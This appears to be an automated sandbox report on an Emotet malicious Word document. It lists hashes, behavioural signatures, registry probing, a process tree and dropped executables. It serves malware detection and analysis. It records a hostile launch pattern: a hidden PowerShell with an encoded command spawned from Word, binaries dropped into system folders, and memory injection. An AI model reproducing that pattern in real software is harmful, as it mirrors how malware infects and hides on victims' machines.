Analysis
-
max time kernel
60s
-
max time network
60s
-
platform
windows10_x64
-
resource
win10v20201028
-
submitted
30-10-2020 13:00
-
Static task
static1
General
-
Target
emotet_e1_dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b_2020-10-30__125817440243._doc.doc
-
Size
208KB
-
MD5
629397193e4445a719af0c3b08d03666
-
SHA1
05e7aa8f51f1fe2d939b6efbe87d351cd2dbe73e
-
SHA256
dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b
-
SHA512
dcfc7f1e181a971153e778002a90dd77ff702339bb66b81ce44520d1236897677228b17e7d28f8cc132323e105cacfc76970928d23fa805fca6fe741304e7912
Malware Config
Extracted
Extracted
emotet
Epoch1
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: POwersheLL.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3208 | 1972 | POwersheLL.exe
-
Emotet Payload 2 IoCs
Detects Emotet payload in memory.
Processes:
resource | yara_rule
behavioral1/memory/1624-16-0x0000000002340000-0x0000000002350000-memory.dmp | emotet
behavioral1/memory/3440-22-0x0000000002140000-0x0000000002150000-memory.dmp | emotet
-
Blacklisted process makes network request 1 IoCs
Processes: POwersheLL.exe
flow | pid | process
20 | 3208 | POwersheLL.exe
-
Executes dropped EXE 2 IoCs
Processes: Xp13y90.exe, sdchange.exe
pid | process
1624 | Xp13y90.exe
3440 | sdchange.exe
-
Drops file in System32 directory 1 IoCs
Processes: Xp13y90.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe | Xp13y90.exe
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: WINWORD.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes: WINWORD.EXE
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes: WINWORD.EXE
pid | process
984 | WINWORD.EXE
984 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes: POwersheLL.exe, sdchange.exe
pid | process
3208 | POwersheLL.exe
3208 | POwersheLL.exe
3208 | POwersheLL.exe
3440 | sdchange.exe
3440 | sdchange.exe
3440 | sdchange.exe
3440 | sdchange.exe
3440 | sdchange.exe
3440 | sdchange.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: POwersheLL.exe
description | pid | process
Token: SeDebugPrivilege | 3208 | POwersheLL.exe
-
Suspicious use of SetWindowsHookEx 11 IoCs
Processes: WINWORD.EXE, Xp13y90.exe, sdchange.exe
pid | process
984 | WINWORD.EXE
984 | WINWORD.EXE
984 | WINWORD.EXE
984 | WINWORD.EXE
984 | WINWORD.EXE
984 | WINWORD.EXE
984 | WINWORD.EXE
1624 | Xp13y90.exe
1624 | Xp13y90.exe
3440 | sdchange.exe
3440 | sdchange.exe
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes: Xp13y90.exe
description | pid | process | target process
PID 1624 wrote to memory of 3440 | 1624 | Xp13y90.exe | sdchange.exe
PID 1624 wrote to memory of 3440 | 1624 | Xp13y90.exe | sdchange.exe
PID 1624 wrote to memory of 3440 | 1624 | Xp13y90.exe | sdchange.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_dfd539a7d82b252f02924f5f2da0724ffe381df1456f08415266b0040d0a914b_2020-10-30__125817440243._doc.doc" /o "" 1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -windowstyle hidden -ENCOD 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 ⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe
C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe 1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe
"C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe" 2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\Wqewzer\Zdoz0xf\Xp13y90.exe
MD5
adc67e5610494dbbaff4b193f7b81f93
SHA1
6d98ac46c3eeba15b489b1807e8758722de6c64b
SHA256
4cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1
SHA512
54077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce
-
C:\Windows\SysWOW64\WPDShextAutoplay\sdchange.exe
MD5
adc67e5610494dbbaff4b193f7b81f93
SHA1
6d98ac46c3eeba15b489b1807e8758722de6c64b
SHA256
4cc73bcf80bccf8a54ac21b6e66511ef1235a3d81bd36189c5d4d19bbc2f59c1
SHA512
54077c5371a4c477592120fd741e424e70dee9c7c8ebf82b29395334d767698495b10af6da8d241f3598d229eeee6e446dc2dfb04f82a53b4fec4d26293112ce
-
memory/984-0-0x00007FF81BB20000-0x00007FF81C157000-memory.dmp
Filesize
6.2MB
-
memory/984-2-0x000002BD2CE26000-0x000002BD2CE2F000-memory.dmp
Filesize
36KB
-
memory/1624-16-0x0000000002340000-0x0000000002350000-memory.dmp
Filesize
64KB
-
memory/3208-8-0x00007FF815430000-0x00007FF815E1C000-memory.dmp
Filesize
9.9MB
-
memory/3208-9-0x0000020978180000-0x0000020978181000-memory.dmp
Filesize
4KB
-
memory/3208-10-0x0000020978370000-0x0000020978371000-memory.dmp
Filesize
4KB
-
memory/3440-17-0x0000000000000000-mapping.dmp
-
memory/3440-22-0x0000000002140000-0x0000000002150000-memory.dmp
Filesize
64KB